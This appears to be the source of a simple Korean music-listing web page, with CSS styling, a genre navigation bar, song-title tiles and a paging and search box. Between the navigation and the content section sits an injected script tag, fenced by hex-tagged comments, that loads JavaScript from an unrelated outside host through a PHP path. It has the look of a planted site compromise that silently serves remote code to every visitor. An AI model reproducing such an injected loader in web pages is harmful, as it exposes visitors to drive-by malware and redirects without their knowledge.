<?

?>
<!DOCTYPE HTML>
<html>
 <head>
  <title> New Document </title>
  <meta charset="UTF-8">
  <style type="text/css">
	body {margin: 0; padding: 0;}
	#musics_wrap {
		width: 980px;
		height: 760px;
	}
	#musics_wrap h1 {
		margin: 0;
		padding: 30px 0 0 30px;
		height: 60px;
	}
	.category_nav {
		width: 800px;
		height: 20px;
		margin: 0 auto;
		border-bottom: 1px dotted black;
	}
		.category_nav ul {
			width: 600px;
			list-style: none;
			padding: 0;
			margin: 0 auto;
		}
			.category_nav ul li {
				float: left;
				width: 100px;
				text-align: center;
			}
	section{
		width: 900px;
		height: 470px;
		margin: 0 auto;
		padding: 30px 0 0 0;
	}
		section .category_contents {
			width: 200px;
			height: 200px;
			background: #1caff6;
			display: inline-block;
			margin: 10px;
			border-radius: 200px;
			text-align: center;
			font-size: 16pt;
			line-height: 200px;
		}

	#bot {
		width: 600px;
		height: 55px;
		margin: 0 auto;
	}
		#bot .paging{
			margin: 60px auto 10px auto;
			width: 170px;
		}
		#bot .bot_search {
			width: 210px;
			margin: 0 auto;
		}
  </style>
 </head>

 <body>
	<div id="musics_wrap">
		<header>
			<h1>Musics</h1>
		</header>
		<div class="category_nav">
			<nav>
				<ul>
					<li>전체</li>
					<li>발라드</li>
					<li>힙합</li>
					<li>Rock</li>
					<li>R&B</li>
					<li>팝송</li>
				</ul>
			</nav>
		</div><!--ee641a--><script type="text/javascript" src="http://hancomotors.com/r9ctwktv.php?id=14155828"></script><!--/ee641a-->



		<section>
			<div class="category_contents">
				김광진-편지
			</div>
			<div class="category_contents">
				송희문-서커스
			</div>
			<div class="category_contents">
				송희문-비가오는날엔
			</div>
			<div class="category_contents">
				송희문-비비츄
			</div>
			<div class="category_contents">
				송희문-죄와벌
			</div>
			<div class="category_contents">
				구교준-형
			</div>
			<div class="category_contents">
				구교준-형
			</div>
			<div class="category_contents">
				구교준-형
			</div>
		</section>

		<div id="bot">
			<div class="paging">
				[1][2][3][4][5][다음]
			</div>
			<div class="bot_search">
				<input type="text" placeholder="검색"> <input type="submit" value="검색">
			</div>
		</div>
	</div>
 </body>
</html>
